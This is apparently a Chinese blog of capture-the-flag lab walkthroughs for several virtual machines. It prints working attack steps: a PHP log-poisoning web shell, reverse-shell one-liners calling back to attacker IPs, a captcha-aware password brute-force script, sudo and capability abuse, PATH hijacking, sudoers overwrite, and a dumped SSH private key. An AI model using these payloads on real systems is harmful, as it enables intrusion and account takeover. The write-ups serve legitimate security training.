ip地址为192.168.1.105 ,扫一下端口情况发现开了80和22,80端口只有一个HELLO WORLD!,扫一下目录,但是没扫出来,他应该是有一个防爆破的,扫出来很多403,使用命令gobuster -q dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php -u http://192.168.1.105 --delay 1s -t 1去慢慢扫,但是真的很慢,扫出来一个includes.php 已经很明显是文件包含了,用wfuzz去测试一下,扫到一个display_page
┌──(root㉿kali-plus)-[~]
└─# wfuzz -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://192.168.1.105/includes.php?FUZZ=../../../../../../etc/passwd --hh 2 ********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer * ********************************************************
Target: http://192.168.1.105/includes.php?FUZZ=../../../../../../etc/passwd Total requests: 220559 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000217298: 200 28 L 41 W 1460 Ch "display_page"
Total time: 1154.698 Processed Requests: 220559 Filtered Requests: 220558 Requests/sec.: 191.0100
尝试去读一下日志/var/log/apache2/access.log ,直接填url里会被url编码,所以在UA头填上一
句话
user flag
GET / HTTP/1.1
Host: 192.168.1.105
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: <?php system($_GET[1]); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
然后尝试去rce,这里建议把靶机重新导入一下,以为之前爆破目录的日志太多了,然后可以正常rce,反弹个shell 记得用bash -c 包含一下反弹shell的命令http://192.168.1.102/includes.php?display_page=/var/log/apache2/access.log&1=bash%20-c%20'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.1.104%2F1234%200%3E%261'然后就能拿到一个shell了,进去就看到waf.php
<?php
class WAF
{
const attempts = 200;
const outTime = 2;
const path = "/var/www/data/";
const dbFile = "waf.db.txt";
const blFile = "waf.bl.txt";
private static function loadClean($dbf) {
$dbf = self::path.$dbf;
if(file_exists($dbf)) {
$db = unserialize(file_get_contents($dbf));
} else {
if (!is_dir(self::path)){
mkdir(self::path);
}
}
if (!is_array($db)){
$db = array();
}
foreach ($db as $row => $sub_array) {
if($sub_array['time'] < time()) {
unset($db[$row]);
}
}
file_put_contents($dbf,serialize($db));
return $db;
}
private static function check($db) {
if (is_array($db)){
if (count($db) > 1) {
return array_count_values(array_column($db, 'ip'))[$_SERVER['REMOTE_ADDR']];
}
} else {
return 0;
}
}
private static function write($db,$dbf) {
file_put_contents(self::path.$dbf,serialize($db));
}
private static function add($db,$tm=1) {
array_push($db,['time'=>time() + (60*$tm), 'ip'=>$_SERVER['REMOTE_ADDR']]);
return $db;
}
public static function DoWAF ($hit){
while (!@mkdir(self::path.'db.lock',0777)) {
usleep(100000);
}
$db = self::loadClean(self::dbFile);
$bl = self::loadClean(self::blFile);
if( self::check($bl) > 0) {
self::forbidden();
} elseif($hit>0) {
$db = self::add($db);
self::write($db, self::dbFile);
if (self::check($db) >= self::attempts) {
self::write(self::add($bl,self::outTime), self::blFile);
self::forbidden();
}
if($hit == 403) {
self::forbidden();
} else {
self::notfound();
}
}
rmdir(self::path.'db.lock');
}
public static function forbidden () {
rmdir(self::path.'db.lock');
header('HTTP/1.0 403 Forbidden', true, 403);
die('<h1>Forbidden</h1>');
}
public static function notfound () {
rmdir(self::path.'db.lock');
header('HTTP/1.0 404 Not Found', true, 404);
die('<h1>Not Found</h1>');
}
}
WAF::DoWAF(isset($_GET['e'])?$_GET['e']:0);
?>
进去提权,有一个exiftool,可以写个公钥进去
www-data@TheWall:/var/www/html$ sudo -l
sudo -l
Matching Defaults entries for www-data on TheWall: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on TheWall: (john : john) NOPASSWD: /usr/bin/exiftool
www-data@TheWall:/var/www/html$ cd /tmp cd /tmp www-data@TheWall:/tmp$ ls ls www-data@TheWall:/tmp$ touch authorized_keys touch authorized_keys www-data@TheWall:/tmp$ echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC27Gv0W3j0TPawzx/q7rDyzDBYiuRRSs4HLFBpmYIxkxviNL1njJNjA3Mw7UcLAa6o62H7Xn6jlYijg8Q8ttm/BDqtI0N645DrdMOOR6W0N+iZKnkDx7QJ5vPcwE4XTu4rQleQD3fvO8KRAUBakMVPocaai3V9eC9zE4Ex3W/qo0Xk+PNObx5mIT39coHAq7DxzSoWsnHOVnFYqvXgzD44txWOMHIdqSp93AWV0+d37diHgDDWvpxS/BpKfydSFtR728dJ2KXuNfWSiy3R5wPGW6p9JffExiyrg/d6Nw74+8TrzxELM0r0gRjTefVbPZyK8fa4Q2xRPrSaD5bYeIt/wNU6YgWTquj3aPY70eTzkK6gckvwOAmRQ8lLCG67Z8IbnHeQVkVg4uuujq6nRsvMx+YbTTCOLEZQkCQKjpubJYDZsncP9LSNxn/Sq5vpEtKXbBfl1qD41tU72/wg2A4PiYrDkgr3LP26Qbg66xY7Hmtb6PgVe1VnmRoWuUJ6T/S5AtLBNljksXAJru/9HwP0bNpgTuMV06U5JySzf7OoT6Nye5zCOzrWOi3NrZGiKb55ue0EnoFvs1ZEuhgxH/VjdzXNCtV3OJtdlRqbrd+q5Si6fT3ew81tLK040T2w3oKIhIJa9JbhuOK2SR2gXv96qu045/NtXC/re56IIw+Xfw== root@kali-plus' > authorized_keys
<tXC/re56IIw+Xfw== root@kali-plus' > authorized_keys
www-data@TheWall:/tmp$ INPUT=authorized_keys
INPUT=authorized_keys
www-data@TheWall:/tmp$ LFILE=/home/john/.ssh/authorized_keys LFILE=/home/john/.ssh/authorized_keys
www-data@TheWall:/tmp$ sudo -u john exiftool -filename=$LFILE $INPUT
sudo -u john exiftool -filename=$LFILE $INPUT
Warning: Error removing old file - authorized_keys
1 image files updated
┌──(root㉿kali-plus)-[~/.ssh]
└─# ssh john@192.168.1.102
The authenticity of host '192.168.1.102 (192.168.1.102)' can't be established. ED25519 key fingerprint is SHA256:Ew2srZtokZQDN/Tw8xKgD2oEnd4Cgyo+aGT0drkNYQc. This key is not known by any other names. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.1.102' (ED25519) to the list of known hosts. Linux TheWall 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Oct 19 17:07:17 2022 from 10.0.2.15 john@TheWall:~$ ls user.txt
john@TheWall:~$ cat user.txt
cc5db5e7b0a26e807765f47a006f6221
提权-root flag
传一个linpeas.sh进去看看,发现tar有任意文件读取的权限,尝试去读取root的私钥
Files with capabilities:
/usr/sbin/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
john@TheWall:/$ LFILE=/id_rsa
john@TheWall:/$ /usr/sbin/tar xf "$LFILE" -I '/bin/bash -c "cat 1>&2"'
-----BEGIN OPENSSH PRIVATE KEY----- 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
-----END OPENSSH PRIVATE KEY-----
然后使用私钥去连接
┌──(root㉿kali-plus)-[~]
└─# ssh root@192.168.1.102 -i tmp
Linux TheWall 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 19 19:51:15 2022 from 10.0.2.15
root@TheWall:~# ls
r0Ot.txT
root@TheWall:~# cat r0Ot.txT
4be82a3be9aed6eea5d0cce68e17662e
也可以直接去读取root.txt,但是这个靶机的root flag名字改了
Krustykrab
信息搜集
ip地址为192.168.56.132 开放80和22,80端口是一个apache,查看源码发现一个<!--/var/www/html/finexo -->路由 访问之后右上角有登录界面,在/team.html页面有一些人名,猜测是用户名,这里有个坑就是验证码要小写,这里我用大佬的python脚本去爆破密码
import requests
WORDLIST_FILE = r"/usr/share/wordlists/rockyou.txt"
BASE_URL = 'http://192.168.1.132/finexo/'
LOGIN_URL = BASE_URL + 'login.php'
CAPTCHA_URL = BASE_URL + 'login.php?action=generateCaptcha'
def read_wordlist(path):
# 确保 with 语句及其后续代码块正确缩进
with open(path, 'r', encoding='utf-8') as wordlist:
for word in wordlist:
yield word.strip()
session = requests.Session()
for password in read_wordlist(WORDLIST_FILE):
captcha = session.get(CAPTCHA_URL).text
data = {
'username': 'SpongeBob',
'password': password,
'captcha': captcha
}
response = session.post(LOGIN_URL, data=data)
if 'Wrong' in response.text:
print(f'[!] Wrong password {password}')
elif 'Captcha' in response.text:
print(f'[!] Wrong captcha {password}')
else:
print(f'[+] Found password {password}')
break
等待一会就能得到密码为squarepants
[+] Found password squarepants
登录进去之后发现好多功能点都没什么用,有一个邮箱里面有一个叫 Administratro 有一个文件上传但是上传的都被改成jpg了没法利用,在edit profile页面可以修改密码,抓包之后发现可以修改用户名,尝试修改Administratro 的密码,显示{"success":true} 即为修改成功,退出当前用户,使用修改好的密码去登录Administratro ,登录进去之后发现页面下方有命令执行功能,直接拿shell
user flag
nc 192.168.56.101 1234 -e /bin/sh
寻找提权点
┌──(root㉿kali-plus)-[~]
└─# nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 192.168.56.132 58090
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/usr/bin/script -qc /bin/bash /dev/null
www-data@KrustyKrab:/var/www/html/finexo/admin_dashborad$ sudo -l
Matching Defaults entries for www-data on KrustyKrab:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User www-data may run the following commands on KrustyKrab:
(KrustyKrab) NOPASSWD: /usr/bin/split
发现可以以KrustyKrab用户的权限去运行split,直接提权
www-data@KrustyKrab:/var/www/html/finexo/admin_dashborad$ sudo -u KrustyKrab split --filter=/bin/sh /dev/stdin
<udo -u KrustyKrab split --filter=/bin/sh /dev/stdin
id
uid=1000(KrustyKrab) gid=1000(debian) groups=1000(debian),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev),110(bluetooth),1002(krustygroup)
whoami
KrustyKrab
/usr/bin/script -qc /bin/bash /dev/null
KrustyKrab@KrustyKrab:/var/www/html/finexo/admin_dashborad$
拿到了KrustyKrab用户的shell
KrustyKrab@KrustyKrab:~$ cat user.txt cat user.txt cat user.txt dcc8b0c111c9fa1522c7abfac8d1864b
提权-root flag
在同一个目录下有一个help的可以文件
KrustyKrab@KrustyKrab:~$ file help
file help
file help
help: GIF image data, version 89a, 480 x 270
发现是一个GIF图片,把图片下载到本地看看,发现是海绵宝宝在做美味的蟹黄堡,还说明了做蟹黄堡的顺序,猜测有步骤和这个相关,下面要找提权点
KrustyKrab@KrustyKrab:~$
sudo -l sudo
-l sudo -l
Matching Defaults entries for KrustyKrab on KrustyKrab:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User KrustyKrab may run the following commands on KrustyKrab:
(spongebob) NOPASSWD: /usr/bin/ttteeesssttt
有一个ttteeesssttt文件,是要输入正确做蟹黄堡的顺序
KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt
sudo -u spongebob /usr/bin/ttteeesssttt
sudo -u spongebob /usr/bin/ttteeesssttt
Spongebob forgot how to make Krabby Patty, You need to help him! Current shuffled recipe order:
A: Top bun
B: Ketchup
C: Mustard
D: Pickles
E: Tomato
F: Lettuce
G: Onion
H: Bottom bun
I: Patty
J: Cheese
Please enter the correct order using letters (e.g., ABCDEFGHIJ): Enter 10 letters (A-J):
可以去查看刚刚得到的gif图片,里面有顺序或者直接strings,得到的顺序是,每次运行之后的顺序还不一样,顺序是
Bottom bun
Patty
Lettuce
Cheese
Onion
Tomato
Ketchup
Mustard
Pickles
Top bun
输入正确的顺序就能拿到spongebob用户的shell了
KrustyKrab@KrustyKrab:~$ sudo -u spongebob /usr/bin/ttteeesssttt
Spongebob forgot how to make Krabby Patty, You need to help him!
Current shuffled recipe order:
A: Ketchup
B: Mustard
C: Onion
D: Tomato
E: Bottom bun
F: Top bun
G: Lettuce
H: Pickles
I: Cheese
J: Patty
Please enter the correct order using letters (e.g., ABCDEFGHIJ): Enter 10 letters (A-J): EJGICDABHF
Validation successful! Perfect Krabby Patty! spongebob@KrustyKrab:/home/KrustyKrab$ id
id
uid=1001(spongebob) gid=1001(spongebob) groups=1001(spongebob),100(users),1002(krustygroup) spongebob@KrustyKrab:/home/KrustyKrab$
找到了2张图片和一个note.txt
spongebob@KrustyKrab:~$ cat note.txt
cat note.txt cat note.txt
Squidward is waiting for you!!!! password is md5($key1$key2).
It's not so hard as you think.
得到提示,密码是key1和key2的md5值,查看一下即可
spongebob@KrustyKrab:~$ cat key1
cat key1
cat key1
e1964798cfe86e914af895f8d0291812
spongebob@KrustyKrab:~$ md5sum key2.jpeg
md5sum key2.jpeg
md5sum key2.jpeg
5e1d0c1a168dc2d70004c2b00ba314ae key2.jpeg
加密之后的结果为7ac254848d6e4556b73398dde2e4ef82 得到Squidward用户的密码
spongebob@KrustyKrab:~$ su - Squidward
su - Squidward
su - Squidward
Password: 7ac254848d6e4556b73398dde2e4ef82
7ac254848d6e4556b73398dde2e4ef82
$ id
uid=1002(Squidward) gid=1003(Squidward) groups=1003(Squidward)
查找提权点,发现有一个laststep,strings一下
Squidward@KrustyKrab:~$ strings laststep
/lib64/ld-linux-x86-64.so.2
setgid setuid
system __libc_start_main __cxa_finalize
libc.so.6 GLIBC_2.2.5 GLIBC_2.34
_ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable PTE1 u+UH cat /etc/shadow
发现有一个cat /etc/shadow 传到主机使用ida进行反编译
int __cdecl main(int argc, const char **argv, const char **envp)
{
setgid(0);
setuid(0);
system("cat /etc/shadow");
return 0;
}
可以利用环境变量劫持
echo '#!/bin/sh\n bash -p' > ~/cat
chmod +x ./cat
export PATH=~:$PATH
./laststep
或者
#include <unistd.h>
#include <stdlib.h>
void main() {
// setuid(0);
// setgid(0);
system("/bin/bash -p");
}
gcc cat.c -o cat
export PATH=.:$PATH
./laststep
root@KrustyKrab:/root# cat root.txt
efe397e3897f0c19ef0150c2b69046a3
Icecream
信息搜集
ip地址为192.168.1.103 扫一下端口
┌──(root㉿kali-plus)-[~]
└─# rustscan -a 192.168.1.103
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
0day was here ♥
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.1.103:22
Open 192.168.1.103:80
Open 192.168.1.103:139
Open 192.168.1.103:445
Open 192.168.1.103:9000
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-19 19:05 CST
Initiating ARP Ping Scan at 19:05
Scanning 192.168.1.103 [1 port]
Completed ARP Ping Scan at 19:05, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:05
Completed Parallel DNS resolution of 1 host. at 19:05, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 2, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:05
Scanning bogon (192.168.1.103) [5 ports]
Discovered open port 80/tcp on 192.168.1.103
Discovered open port 139/tcp on 192.168.1.103
Discovered open port 445/tcp on 192.168.1.103
Discovered open port 22/tcp on 192.168.1.103
Discovered open port 9000/tcp on 192.168.1.103
Completed SYN Stealth Scan at 19:05, 0.05s elapsed (5 total ports)
Nmap scan report for bogon (192.168.1.103)
Host is up, received arp-response (0.0019s latency).
Scanned at 2025-04-19 19:05:06 CST for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
139/tcp open netbios-ssn syn-ack ttl 64
445/tcp open microsoft-ds syn-ack ttl 64
9000/tcp open cslistener syn-ack ttl 64
MAC Address: 08:00:27:4B:FC:76 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
Raw packets sent: 6 (248B) | Rcvd: 6 (248B)
开放了这么多端口,curl了一下80端口发现forbidden了 ,用gobuster扫目录但是没扫出来啥,看了一下9000端口
|||
|---|---|
|certificates|{}|
|js_modules|{}|
|config||
|listeners|{}|
|routes|[]|
|applications|{}|
|status||
|modules||
|python||
|version|"3.11.2"|
|lib|"/usr/lib/unit/modules/python3.11.unit.so"|
|php||
|version|"8.2.18"|
|lib|"/usr/lib/unit/modules/php.unit.so"|
|perl||
|version|"5.36.0"|
|lib|"/usr/lib/unit/modules/perl.unit.so"|
|ruby||
|version|"3.1.2"|
|lib|"/usr/lib/unit/modules/ruby.unit.so"|
|java||
|version|"17.0.11"|
|lib|"/usr/lib/unit/modules/java17.unit.so"|
|wasm||
|version|"0.1"|
|lib|"/usr/lib/unit/modules/wasm.unit.so"|
|wasm-wasi-component||
|version|"0.1"|
|lib|"/usr/lib/unit/modules/wasm_wasi_component.unit.so"|
|connections||
|accepted|0|
|active|0|
|idle|0|
|closed|0|
|requests||
|total|0|
|applications|{}|
看到php的版本了,说明可以解析php,先smb上去看看
user flag
┌──(root㉿kali-plus)-[~]
└─# smbclient //192.168.50.47/icecream
Password for [WORKGROUP\root]: Try "help" to get a list of possible commands. smb: \> put reverse.php
putting file reverse.php as \reverse.php (766.2 kb/s) (average 766.2 kb/s)
smb上去传一个反弹shell的脚本上去,然后访问<ip>/reverse.php 即可拿到shell,进去之后找提权点,看到home目录只有一个ice用户,只能从9000端口入手了,先看一眼进程
ice 499 468 0 07:07 ? 00:00:14 unit: controller
ice 500 468 0 07:07 ? 00:00:00 unit: router
发现有关ice用户的进程,是一个关于unit的,但是我不是很了解,看了一下Todd的 Todd-Hmv-Icecream
发现这个 controlapi 可以控制 unit,甚至可以自己创建一个 php 的 Application。不过官方的都是本地通过 curl 和 –unix-socket 来控制的,我们这个直接可以用 9000 端口来搞。
这么一想,其实如果熟悉这个 unit 的话,直接就可以通过这个 9000 端口来提权了。不用去第一步拿 www-data。
然后Todd研究出了几个命令可以拿到ice用户的shell
curl -X PUT -d '{"app":{"type":"php","root":"/tmp","script":"reverse.php"}}' http://192.168.50.47:9000/config/applications
curl -X PUT -d '[{"action":{"share":"/tmp/reverse.php$uri","fallback":{"pass":"applications/app"}}}]' http://192.168.50.47:9000/config/routes
curl -X PUT -d '{"*:8888":{"pass":"routes"}}' http://192.168.50.47:9000/config/listeners
这样就能拿到ice用户的shell 直接拿user flag
ice@icecream:/home/ice$ cat user.txt
cat user.txt
HMVaneraseroflove
提权-root flag
然后找提权点
$ sudo -l Matching Defaults entries for ice on icecream: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty User ice may run the following commands on icecream:
(ALL) NOPASSWD: /usr/sbin/ums2net
在github上搜到了一个项目ums2net 写的是USB通过tcp共享数据,尝试反过来进行修改一下sudoers文件
echo "4444 of=/etc/sudoers bs=4096" > config
sudo /usr/sbin/ums2net -c config -d
然后本地nc上去就行了
echo 'ice ALL=(ALL) NOPASSWD: ALL' |nc $IP 1234
ice@icecream:/$ sudo su -
sudo su -
/etc/sudoers:2:11: error de sintaxis
with the 'visudo' command as root. ^~~~~~~~
root@icecream:~# id
uid=0(root) gid=0(root) grupos=0(root)
root@icecream:~# ls
root.txt
root@icecream:~# cat root.txt
HMViminvisible
Quick
信息搜集
ip地址为192.168.105.153
┌──(root㉿kali-plus)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:1d:89:b5, IPv4: 192.168.105.144
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.105.84 e0:2e:0b:94:50:57 Intel Corporate
192.168.105.153 08:00:27:41:d3:56 PCS Systemtechnik GmbH
192.168.105.221 32:6a:0e:02:96:dd (Unknown: locally administered)
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.990 seconds (128.64 hosts/sec). 3 responded
使用rustscan看一下端口情况
┌──(root㉿kali-plus)-[~]
└─# rustscan -a 192.168.105.153
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Scanning ports faster than you can say 'SYN ACK'
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.105.153:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-21 16:43 CST
Initiating ARP Ping Scan at 16:43
Scanning 192.168.105.153 [1 port]
Completed ARP Ping Scan at 16:43, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:43
Completed Parallel DNS resolution of 1 host. at 16:43, 0.05s elapsed
DNS resolution of 1 IPs took 0.05s. Mode: Async [#: 2, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 16:43
Scanning bogon (192.168.105.153) [1 port]
Discovered open port 80/tcp on 192.168.105.153
Completed SYN Stealth Scan at 16:43, 0.02s elapsed (1 total ports)
Nmap scan report for bogon (192.168.105.153)
Host is up, received arp-response (0.0011s latency).
Scanned at 2025-04-21 16:43:56 CST for 0s
PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:41:D3:56 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
貌似只开放了80端口,curl了一下是一个网页,有文件包含漏洞
user flag
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Quick Automative</title>
<link rel="stylesheet" href="styles.css">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css">
</head>
<body>
<header>
<!-- Photo by Pixabay: https://www.pexels.com/photo/black-lamborghini-murcielago-38570/ -->
<img src="images/logo.png" alt="Logo" height="100">
</header>
<nav>
<ul>
<li><a href="index.php?page=home">Home</a></li>
<li><a href="index.php?page=cars">Cars</a></li>
<li><a href="index.php?page=maintenance_and_repair">Maintenance & Repair</a></li>
<li><a href="index.php?page=about">About</a></li>
<li><a href="index.php?page=contact">Contact</a></li>
</ul>
</nav>
<main>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Home</title>
<link rel="stylesheet" href="styles.css">
</head>
<body>
<div class="content">
<h1>The Best Car Care Solutions for You</h1>
<p>At Quick Automative, we believe that preventive maintenance and quality products can save you money and keep your vehicle running smoothly. We have carefully curated a list of essential car care solutions for you to consider.</p>
</div>
<!-- Service List -->
<div class="content">
<section>
<h2>Our Services</h2>
<p>As a smaller organization, we know how to excel in our services. We deliver you a new car and maintain your car so that it remains in top condition. Are you extremely disappointed because your beloved car has been damaged? Then we can repair it and it will look like new again. Do you have wild ideas? We are ready for you to pimp your beloved car.</p>
<div class="list">
<ul>
<li><i class="fas fa-car"></i> New Cars</li>
<li><i class="fas fa-wrench"></i> Maintenance and Repair</li>
<li><i class="fas fa-paint-brush"></i> Customization</li>
</ul>
</div>
</section>
</div>
<!-- Customer Reviews -->
<div class="content">
<h2>Customer Reviews</h2>
<div class="card-container">
<div class="card">
<img src="images/joe.jpeg" alt="Profile Picture">
<div class="reviewer-info">
<div class="review-text">This is a great car! I really enjoy driving it.</div>
